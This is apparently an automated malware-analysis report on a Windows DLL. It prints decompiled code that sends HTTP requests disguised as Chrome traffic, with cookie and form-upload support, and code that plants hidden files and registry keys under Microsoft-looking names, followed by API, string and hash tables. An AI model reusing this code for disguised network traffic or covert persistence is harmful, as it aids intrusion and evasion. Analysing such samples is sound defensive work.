						__imp__WinHttpSetOption(_v52, 0x1f,  &_v116, 4);
						__imp__WinHttpAddRequestHeaders(_v52, L"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"upgrade-insecure-requests: 1", 0xffffffff, 0xa0000000);
						if(_a60 == 0) {
							L22:
							__eflags = _a28;
							if(_a28 != 0) {
								_v28340 = E1001A370(_t357, _t468, _t469, _a28);
								_v28336 = 0;
								E1000CF20(_t468,  &_v28334, 0, 0x6e1e);
								E1000E743( &_v28336,  &_v28336, 0x3710, L"Cookie: ");
								E1000E6C9( &_v28336, 0x3710, _v28340);
								__imp__WinHttpAddRequestHeaders(_v52,  &_v28336, 0xffffffff, 0xa0000000);
								_push(_v28340);
								E1000CA30(_t357, _t468, _t469, __eflags);
								_t473 = _t473 + 0x2c;
							}
							_v28948 = _a20;
							__eflags = _v28948 - 2;
							if(_v28948 == 2) {
								__imp__WinHttpAddRequestHeaders(_v52, L"Content-Type: application/x-www-form-urlencoded", 0xffffffff, 0xa0000000);
							} else {
								__eflags = _v28948 - 3;
								if(_v28948 == 3) {
									_v28864 = 0;
									E1000CF20(_t468,  &_v28862, 0, 0x206);
									_v28344 = E1001A370(_t357, _t468, _t469, _v48);
									wsprintfW( &_v28864, L"Content-Type: multipart/form-data; boundary=%ws", _v28344);
									__imp__WinHttpAddRequestHeaders(_v52,  &_v28864, 0xffffffff, 0xa0000000);
									_push(_v28344);
									E1000CA30(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 0x20;
								}
							}
							__imp__WinHttpSetTimeouts(_v52, 0xc350, 0xc350, 0xc350, 0xc350);
							_v128 = 0;
							_v124 = 0;
							__eflags = _a20 - 3;
							if(_a20 == 3) {
								_v124 = E10021460(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
								_v128 = L1000CE56(_t357, _v48, _t468, _t469, _v124);
								E1000CF20(_t468, _v128, 0, _v124);
								_t330 = E10021460(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
								_t473 = _t473 + 0x58;
								_v124 = _t330;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28952 = _a36;
							} else {
								_v28952 = _v124;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28956 = _a36;
							} else {
								_v28956 = _v124;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28960 = _a32;
							} else {
								_v28960 = _v128;
							}
							_t288 = _v52;
							__imp__WinHttpSendRequest(_t288, 0, 0, _v28960, _v28956, _v28952, 0); // executed
							_v88 = _t288;
							__eflags = _v88;
							if(_v88 == 0) {
								L57:
								__eflags = _v128;
								if(__eflags != 0) {
									_push(_v128);
									E1000CA30(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 4;
								}
								goto L59;
							} else {
								__imp__WinHttpReceiveResponse(_v52, 0);
								_v88 = _t288;
								__eflags = _v88;
								if(_v88 == 0) {
									goto L57;
								}
								_v28868 = 0;
								__imp__WinHttpQueryHeaders(_v52, 0x16, 0, 0,  &_v28868, 0);
								_t292 = GetLastError();
								__eflags = _t292 - 0x7a;
								if(_t292 == 0x7a) {
									_v28884 = L1000CE56(_t357,  &_v28868, _t468, _t469, _v28868 + 2);
									__eflags = _v28868 + 2;
									E1000CF20(_t468, _v28884, 0, _v28868 + 2);
									_t311 = _v52;
									__imp__WinHttpQueryHeaders(_t311, 0x16, 0, _v28884,  &_v28868, 0);
									_v88 = _t311;
									_v28880 = E1001A400(_t357, _t468, _t469, _v28884);
									_v28964 = E10001160( &_v28912, __eflags, _v28880);
									_v28968 = _v28964;
									_v8 = 0;
									E10001A70(_a64, _v28968);
									_v8 = 0xffffffff;
									E100011A0( &_v28912);
									_push(_v28880);
									E1000CA30(_t357, _t468, _t469, __eflags);
									_push(_v28884);
									_t292 = E1000CA30(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 0x1c;
								}
								_v28876 = 0;
								_v28872 = 0;
								__eflags = _v88;
								if(_v88 == 0) {
									L56:
									_v32 = _v88;
									goto L57;
								} else {
									while(1) {
										_v28868 = 0;
										_t437 = _v52;
										__imp__WinHttpQueryDataAvailable(_v52,  &_v28868); // executed
										__eflags = _t292;
										if(__eflags == 0) {
											break;
										}
										__eflags = _v28868;
										if(_v28868 != 0) {
											_t295 = L1000CE56(_t357, _t437, _t468, _t469, _v28868 + 1);
											_t479 = _t473 + 4;
											_v28876 = _t295;
											__eflags = _v28876;
											if(__eflags != 0) {
												E1000CF20(_t468, _v28876, 0, _v28868 + 1);
												_t473 = _t479 + 0xc;
												_t439 = _v28876;
												_t298 = _v52;
												__imp__WinHttpReadData(_t298, _v28876, _v28868,  &_v28872);
												__eflags = _t298;
												if(__eflags == 0) {
													_push(GetLastError());
													_push("WinHttpQueryDataAvailable failed. Error = %d\n");
													E1000E604(_t357, _t439, _t468, _t469, __eflags);
													_t473 = _t473 + 8;
												}
												__eflags = _v28872;
												if(__eflags != 0) {
													_v28972 = E10001160( &_v28940, __eflags, _v28876);
													_v28976 = _v28972;
													_v8 = 1;
													E10001A70(_a68, _v28976);
													_v8 = 0xffffffff;
													E100011A0( &_v28940);
													_push(_v28876);
													_t292 = E1000CA30(_t357, _t468, _t469, __eflags);
													_t473 = _t473 + 4;
													__eflags = _v28868;
													if(_v28868 > 0) {
														continue;
													}
												} else {
												}
												goto L56;
											}
											_push("Out of memory.\n");
											E1000E604(_t357, _t437, _t468, _t469, __eflags);
											_t473 = _t479 + 4;
											goto L56;
										}
										goto L56;
									}
									_push(GetLastError());
									_push("WinHttpQueryDataAvailable failed. Error = %d\n");
									E1000E604(_t357, _t437, _t468, _t469, __eflags);
									_t473 = _t473 + 8;
									goto L56;
								}
							}
						} else {
							_v140 = 0;
							while( *((intOrPtr*)(_a60 + _v140 * 4)) != 0) {
								__imp__WinHttpAddRequestHeaders(_v52,  *((intOrPtr*)(_a60 + _v140 * 4)), 0xffffffff, 0xa0000000);
								_v140 = _v140 + 1;
							}
							goto L22;
						}
					}
				}
			}












































































                                                                                                                                                      0x10021af0
                                                                                                                                                      0x10021af0
                                                                                                                                                      0x10021af0
                                                                                                                                                      0x10021af3
                                                                                                                                                      0x10021af5
                                                                                                                                                      0x10021b00
                                                                                                                                                      0x10021b01
                                                                                                                                                      0x10021b0d
                                                                                                                                                      0x10021b12
                                                                                                                                                      0x10021b19
                                                                                                                                                      0x10021b20
                                                                                                                                                      0x10021b27
                                                                                                                                                      0x10021b2e
                                                                                                                                                      0x10021b35
                                                                                                                                                      0x10021b54
                                                                                                                                                      0x10021b59
                                                                                                                                                      0x10021b5c
                                                                                                                                                      0x10021b63
                                                                                                                                                      0x100223d3
                                                                                                                                                      0x100223d9
                                                                                                                                                      0x100223e3
                                                                                                                                                      0x10021b69
                                                                                                                                                      0x10021b69
                                                                                                                                                      0x10021b70
                                                                                                                                                      0x10021b83
                                                                                                                                                      0x10021b8a
                                                                                                                                                      0x10021b8f
                                                                                                                                                      0x10021b92
                                                                                                                                                      0x10021b95
                                                                                                                                                      0x10021b9d
                                                                                                                                                      0x10021ba0
                                                                                                                                                      0x10021ba3
                                                                                                                                                      0x10021ba6
                                                                                                                                                      0x10021ba9
                                                                                                                                                      0x10021bad
                                                                                                                                                      0x10021bb0
                                                                                                                                                      0x10021bbd
                                                                                                                                                      0x10021bde
                                                                                                                                                      0x10021be3
                                                                                                                                                      0x10021bbf
                                                                                                                                                      0x10021bc6
                                                                                                                                                      0x10021bcf
                                                                                                                                                      0x10021bf3
                                                                                                                                                      0x10021bf8
                                                                                                                                                      0x10021bf8
                                                                                                                                                      0x10021bcf
                                                                                                                                                      0x10021bc6
                                                                                                                                                      0x10021bfb
                                                                                                                                                      0x10021c02
                                                                                                                                                      0x10021c09
                                                                                                                                                      0x10021c10
                                                                                                                                                      0x10021c24
                                                                                                                                                      0x10021c2a
                                                                                                                                                      0x10021c31
                                                                                                                                                      0x10022367
                                                                                                                                                      0x10022367
                                                                                                                                                      0x1002236b
                                                                                                                                                      0x10022371
                                                                                                                                                      0x10022371
                                                                                                                                                      0x10022377
                                                                                                                                                      0x1002237b
                                                                                                                                                      0x10022381
                                                                                                                                                      0x10022381
                                                                                                                                                      0x10022387
                                                                                                                                                      0x1002238b
                                                                                                                                                      0x10022391
                                                                                                                                                      0x10022391
                                                                                                                                                      0x1002239a
                                                                                                                                                      0x1002239b
                                                                                                                                                      0x100223a6
                                                                                                                                                      0x100223a7
                                                                                                                                                      0x100223b2
                                                                                                                                                      0x100223b3
                                                                                                                                                      0x100223be
                                                                                                                                                      0x100223bf
                                                                                                                                                      0x100223ca
                                                                                                                                                      0x100223cb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100223d0
                                                                                                                                                      0x10021c37
                                                                                                                                                      0x10021c3b
                                                                                                                                                      0x10021c49
                                                                                                                                                      0x10021c4c
                                                                                                                                                      0x10021c56
                                                                                                                                                      0x10021c59
                                                                                                                                                      0x10021c6c
                                                                                                                                                      0x10021c75
                                                                                                                                                      0x10021c76
                                                                                                                                                      0x10021c7b
                                                                                                                                                      0x10021c7b
                                                                                                                                                      0x10021c83
                                                                                                                                                      0x10021c88
                                                                                                                                                      0x10021c8d
                                                                                                                                                      0x10021c97
                                                                                                                                                      0x10021c9d
                                                                                                                                                      0x10021ca7
                                                                                                                                                      0x10021caf
                                                                                                                                                      0x10021cb5
                                                                                                                                                      0x10021cbc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10021cc2
                                                                                                                                                      0x10021ccd
                                                                                                                                                      0x10021cd8
                                                                                                                                                      0x10021cd8
                                                                                                                                                      0x10021cf0
                                                                                                                                                      0x10021cf4
                                                                                                                                                      0x10021cfa
                                                                                                                                                      0x10021d01
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10021d07
                                                                                                                                                      0x10021d0b
                                                                                                                                                      0x10021d0d
                                                                                                                                                      0x10021d11
                                                                                                                                                      0x10021d1f
                                                                                                                                                      0x10021d2e
                                                                                                                                                      0x10021d49
                                                                                                                                                      0x10021d52
                                                                                                                                                      0x10021d53
                                                                                                                                                      0x10021d61
                                                                                                                                                      0x10021d62
                                                                                                                                                      0x10021d67
                                                                                                                                                      0x10021d67
                                                                                                                                                      0x10021d11
                                                                                                                                                      0x10021d6a
                                                                                                                                                      0x10021d7f
                                                                                                                                                      0x10021d8e
                                                                                                                                                      0x10021d99
                                                                                                                                                      0x10021da5
                                                                                                                                                      0x10021db4
                                                                                                                                                      0x10021dca
                                                                                                                                                      0x10021de0
                                                                                                                                                      0x10021df6
                                                                                                                                                      0x10021e0c
                                                                                                                                                      0x10021e16
                                                                                                                                                      0x10021e62
                                                                                                                                                      0x10021e62
                                                                                                                                                      0x10021e66
                                                                                                                                                      0x10021e78
                                                                                                                                                      0x10021e7e
                                                                                                                                                      0x10021e95
                                                                                                                                                      0x10021eae
                                                                                                                                                      0x10021ec9
                                                                                                                                                      0x10021ee3
                                                                                                                                                      0x10021eef
                                                                                                                                                      0x10021ef0
                                                                                                                                                      0x10021ef5
                                                                                                                                                      0x10021ef5
                                                                                                                                                      0x10021efb
                                                                                                                                                      0x10021f01
                                                                                                                                                      0x10021f08
                                                                                                                                                      0x10021f28
                                                                                                                                                      0x10021f0a
                                                                                                                                                      0x10021f0a
                                                                                                                                                      0x10021f11
                                                                                                                                                      0x10021f30
                                                                                                                                                      0x10021f47
                                                                                                                                                      0x10021f5b
                                                                                                                                                      0x10021f74
                                                                                                                                                      0x10021f8f
                                                                                                                                                      0x10021f9b
                                                                                                                                                      0x10021f9c
                                                                                                                                                      0x10021fa1
                                                                                                                                                      0x10021fa1
                                                                                                                                                      0x10021f11
                                                                                                                                                      0x10021fbc
                                                                                                                                                      0x10021fc2
                                                                                                                                                      0x10021fc9
                                                                                                                                                      0x10021fd0
                                                                                                                                                      0x10021fd4
                                                                                                                                                      0x10022002
                                                                                                                                                      0x10022011
                                                                                                                                                      0x1002201e
                                                                                                                                                      0x1002204a
                                                                                                                                                      0x1002204f
                                                                                                                                                      0x10022052
                                                                                                                                                      0x10022052
                                                                                                                                                      0x10022055
                                                                                                                                                      0x10022059
                                                                                                                                                      0x10022069
                                                                                                                                                      0x1002205b
                                                                                                                                                      0x1002205e
                                                                                                                                                      0x1002205e
                                                                                                                                                      0x1002206f
                                                                                                                                                      0x10022073
                                                                                                                                                      0x10022083
                                                                                                                                                      0x10022075
                                                                                                                                                      0x10022078
                                                                                                                                                      0x10022078
                                                                                                                                                      0x10022089
                                                                                                                                                      0x1002208d
                                                                                                                                                      0x1002209d
                                                                                                                                                      0x1002208f
                                                                                                                                                      0x10022092
                                                                                                                                                      0x10022092
                                                                                                                                                      0x100220be
                                                                                                                                                      0x100220c2
                                                                                                                                                      0x100220c8
                                                                                                                                                      0x100220cb
                                                                                                                                                      0x100220cf
                                                                                                                                                      0x10022355
                                                                                                                                                      0x10022355
                                                                                                                                                      0x10022359
                                                                                                                                                      0x1002235e
                                                                                                                                                      0x1002235f
                                                                                                                                                      0x10022364
                                                                                                                                                      0x10022364
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100220d5
                                                                                                                                                      0x100220db
                                                                                                                                                      0x100220e1
                                                                                                                                                      0x100220e4
                                                                                                                                                      0x100220e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100220ee
                                                                                                                                                      0x1002210b
                                                                                                                                                      0x10022111
                                                                                                                                                      0x10022117
                                                                                                                                                      0x1002211a
                                                                                                                                                      0x10022132
                                                                                                                                                      0x1002213e
                                                                                                                                                      0x1002214b
                                                                                                                                                      0x10022167
                                                                                                                                                      0x1002216b
                                                                                                                                                      0x10022171
                                                                                                                                                      0x10022183
                                                                                                                                                      0x1002219b
                                                                                                                                                      0x100221a7
                                                                                                                                                      0x100221ad
                                                                                                                                                      0x100221be
                                                                                                                                                      0x100221c3
                                                                                                                                                      0x100221d0
                                                                                                                                                      0x100221db
                                                                                                                                                      0x100221dc
                                                                                                                                                      0x100221ea
                                                                                                                                                      0x100221eb
                                                                                                                                                      0x100221f0
                                                                                                                                                      0x100221f0
                                                                                                                                                      0x100221f3
                                                                                                                                                      0x100221fd
                                                                                                                                                      0x10022207
                                                                                                                                                      0x1002220b
                                                                                                                                                      0x1002234f
                                                                                                                                                      0x10022352
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10022211
                                                                                                                                                      0x10022211
                                                                                                                                                      0x10022211
                                                                                                                                                      0x10022222
                                                                                                                                                      0x10022226
                                                                                                                                                      0x1002222c
                                                                                                                                                      0x1002222e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10022249
                                                                                                                                                      0x10022250
                                                                                                                                                      0x10022261
                                                                                                                                                      0x10022266
                                                                                                                                                      0x10022269
                                                                                                                                                      0x1002226f
                                                                                                                                                      0x10022276
                                                                                                                                                      0x1002229d
                                                                                                                                                      0x100222a2
                                                                                                                                                      0x100222b3
                                                                                                                                                      0x100222ba
                                                                                                                                                      0x100222be
                                                                                                                                                      0x100222c4
                                                                                                                                                      0x100222c6
                                                                                                                                                      0x100222ce
                                                                                                                                                      0x100222cf
                                                                                                                                                      0x100222d4
                                                                                                                                                      0x100222d9
                                                                                                                                                      0x100222d9
                                                                                                                                                      0x100222dc
                                                                                                                                                      0x100222e3
                                                                                                                                                      0x100222f9
                                                                                                                                                      0x10022305
                                                                                                                                                      0x1002230b
                                                                                                                                                      0x1002231c
                                                                                                                                                      0x10022321
                                                                                                                                                      0x1002232e
                                                                                                                                                      0x10022339
                                                                                                                                                      0x1002233a
                                                                                                                                                      0x1002233f
                                                                                                                                                      0x10022342
                                                                                                                                                      0x10022349
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100222e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100222e3
                                                                                                                                                      0x10022278
                                                                                                                                                      0x1002227d
                                                                                                                                                      0x10022282
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10022282
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10022252
                                                                                                                                                      0x10022236
                                                                                                                                                      0x10022237
                                                                                                                                                      0x1002223c
                                                                                                                                                      0x10022241
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10022241
                                                                                                                                                      0x1002220b
                                                                                                                                                      0x10021e18
                                                                                                                                                      0x10021e18
                                                                                                                                                      0x10021e33
                                                                                                                                                      0x10021e5a
                                                                                                                                                      0x10021e2d
                                                                                                                                                      0x10021e2d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10021e33
                                                                                                                                                      0x10021e16
                                                                                                                                                      0x10021d01

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 100211B0: _memset.LIBCMT ref: 100212CB
                                                                                                                                                        • Part of subcall function 100211B0: _strlen.LIBCMT ref: 1002130A
                                                                                                                                                        • Part of subcall function 1001A370: _strlen.LIBCMT ref: 1001A381
                                                                                                                                                        • Part of subcall function 1001A370: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
                                                                                                                                                        • Part of subcall function 1001A370: _memset.LIBCMT ref: 1001A3C6
                                                                                                                                                        • Part of subcall function 1001A370: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
                                                                                                                                                      • _wcscpy_s.LIBCMT ref: 10021BDE
                                                                                                                                                      • _wcscpy_s.LIBCMT ref: 10021BF3
                                                                                                                                                      • WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                      • WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                      • WinHttpSetOption.WINHTTP(00000000,00000058,?,00000004), ref: 10021C97
                                                                                                                                                      • WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 10021CAF
                                                                                                                                                      • WinHttpOpenRequest.WINHTTP(00000000,?,?,HTTP/1.1,00000000,00000000,00000100), ref: 10021CF4
                                                                                                                                                      • WinHttpSetCredentials.WINHTTP(00000000,00000001,00000001,?,?,00000000), ref: 10021D49
                                                                                                                                                      • WinHttpQueryOption.WINHTTP(00000000,0000001F,00000100,?), ref: 10021D7F
                                                                                                                                                      • WinHttpSetOption.WINHTTP(00000000,0000001F,00000100,00000004), ref: 10021DB4
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,000000FF,A0000000), ref: 10021DCA
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3,000000FF,A0000000), ref: 10021DE0
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,000000FF,A0000000), ref: 10021DF6
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,upgrade-insecure-requests: 1,000000FF,A0000000), ref: 10021E0C
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,00000000,000000FF,A0000000), ref: 10021E5A
                                                                                                                                                      • _memset.LIBCMT ref: 10021E95
                                                                                                                                                      • _wcscpy_s.LIBCMT ref: 10021EAE
                                                                                                                                                      • _wcscat_s.LIBCMT ref: 10021EC9
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,?,000000FF,A0000000), ref: 10021EE3
                                                                                                                                                      • WinHttpAddRequestHeaders.WINHTTP(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,A0000000), ref: 10021F28
                                                                                                                                                        • Part of subcall function 10021460: _memset.LIBCMT ref: 100214F6
                                                                                                                                                        • Part of subcall function 10021460: _memset.LIBCMT ref: 10021513
                                                                                                                                                        • Part of subcall function 10021460: _memset.LIBCMT ref: 10021530
                                                                                                                                                        • Part of subcall function 10021460: _sprintf.LIBCMT ref: 10021552
                                                                                                                                                        • Part of subcall function 10021460: _sprintf.LIBCMT ref: 1002156C
                                                                                                                                                        • Part of subcall function 10021460: _sprintf.LIBCMT ref: 10021598
                                                                                                                                                        • Part of subcall function 10021460: _strlen.LIBCMT ref: 100215AF
                                                                                                                                                        • Part of subcall function 10021460: _strlen.LIBCMT ref: 100215D7
                                                                                                                                                      • WinHttpSetTimeouts.WINHTTP(00000000,0000C350,0000C350,0000C350,0000C350), ref: 10021FBC
                                                                                                                                                      • _memset.LIBCMT ref: 1002201E
                                                                                                                                                      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000), ref: 100220C2
                                                                                                                                                      • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 100220DB
                                                                                                                                                      • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,?,00000000), ref: 1002210B
                                                                                                                                                      • GetLastError.KERNEL32 ref: 10022111
                                                                                                                                                      • _memset.LIBCMT ref: 1002214B
                                                                                                                                                      • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,?,?,00000000), ref: 1002216B
                                                                                                                                                      • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 10022226
                                                                                                                                                      • GetLastError.KERNEL32 ref: 10022230
                                                                                                                                                      • _printf.LIBCMT ref: 1002223C
                                                                                                                                                      • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022371
                                                                                                                                                      • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022381
                                                                                                                                                      • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022391
                                                                                                                                                      Strings
                                                                                                                                                      • Out of memory., xrefs: 10022278
                                                                                                                                                      • GET, xrefs: 10021BD3
                                                                                                                                                      • P, xrefs: 10021B2E
                                                                                                                                                      • upgrade-insecure-requests: 1, xrefs: 10021E03
                                                                                                                                                      • A WinHTTP Example Program/1.0, xrefs: 10021C1F
                                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 10021F1F
                                                                                                                                                      • Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7, xrefs: 10021DED
                                                                                                                                                      • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 10022237
                                                                                                                                                      • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 10021DC1
                                                                                                                                                      • HTTP/1.1, xrefs: 10021CE3
                                                                                                                                                      • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3, xrefs: 10021DD7
                                                                                                                                                      • Cookie: , xrefs: 10021E9D
                                                                                                                                                      • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 100222CF
                                                                                                                                                      • POST, xrefs: 10021BE8
                                                                                                                                                      • Content-Type: multipart/form-data; boundary=%ws, xrefs: 10021F68
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Http$HeadersRequest$_memset$OptionQuery_strlen$CloseHandle_sprintf_wcscpy_s$ByteCharErrorLastMultiOpenWide$AvailableConnectCredentialsDataReceiveResponseSendTimeouts_printf_wcscat_s
                                                                                                                                                      • String ID: A WinHTTP Example Program/1.0$Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=%ws$Cookie: $GET$HTTP/1.1$Out of memory.$P$POST$User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$WinHttpQueryDataAvailable failed. Error = %d$WinHttpQueryDataAvailable failed. Error = %d$upgrade-insecure-requests: 1
                                                                                                                                                      • API String ID: 2394362766-3430901228
                                                                                                                                                      • Opcode ID: b8ee3584adcfd30ec297091367d7441899c7aa05c1a39fbd4c09932605cfc880
                                                                                                                                                      • Instruction ID: 00e1b7ec85819600eadfa1f4c4e1cc9d1ca762337438c411615f13f897333fae
                                                                                                                                                      • Opcode Fuzzy Hash: b8ee3584adcfd30ec297091367d7441899c7aa05c1a39fbd4c09932605cfc880
                                                                                                                                                      • Instruction Fuzzy Hash: 0D4238B5D00218EBEB10CFA4DC85BEEB7B5FB48304F508258F609A7281D779AA84CF51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001FA30, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 137COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t57;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0); // executed
				E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF20(_t77,  &_v803, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF20(_t77,  &_v267, 0, 0x103);
				E1001F990(__ebx, _t77, __esi, _t94,  &_v268); // executed
				_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8); // executed
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8); // executed
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8); // executed
						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8); // executed
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8); // executed
								_t99 = _t52;
								if(_t52 != 0) {
									_t54 = E1001F5F0(_a4, _t99,  &_v804, _a4, _a8); // executed
									if(_t54 != 0) {
										_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8); // executed
										_t101 = _t55;
										if(_t55 != 0) {
											_t57 = E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8); // executed
											if(_t57 != 0) {
												_v536 = 1;
											}
										}
									}
								}
							}
						}
					}
				}
				return _v536;
			}



















                                                                                                                                                      0x1001fa30
                                                                                                                                                      0x1001fa30
                                                                                                                                                      0x1001fa39
                                                                                                                                                      0x1001fa43
                                                                                                                                                      0x1001fa58
                                                                                                                                                      0x1001fa6d
                                                                                                                                                      0x1001fa84
                                                                                                                                                      0x1001fa8c
                                                                                                                                                      0x1001faa1
                                                                                                                                                      0x1001fab6
                                                                                                                                                      0x1001facd
                                                                                                                                                      0x1001fad5
                                                                                                                                                      0x1001faea
                                                                                                                                                      0x1001faf9
                                                                                                                                                      0x1001fb13
                                                                                                                                                      0x1001fb1b
                                                                                                                                                      0x1001fb1d
                                                                                                                                                      0x1001fb35
                                                                                                                                                      0x1001fb3d
                                                                                                                                                      0x1001fb3f
                                                                                                                                                      0x1001fb54
                                                                                                                                                      0x1001fb5c
                                                                                                                                                      0x1001fb5e
                                                                                                                                                      0x1001fb76
                                                                                                                                                      0x1001fb7e
                                                                                                                                                      0x1001fb80
                                                                                                                                                      0x1001fb94
                                                                                                                                                      0x1001fb9c
                                                                                                                                                      0x1001fb9e
                                                                                                                                                      0x1001fbaf
                                                                                                                                                      0x1001fbb9
                                                                                                                                                      0x1001fbc3
                                                                                                                                                      0x1001fbcb
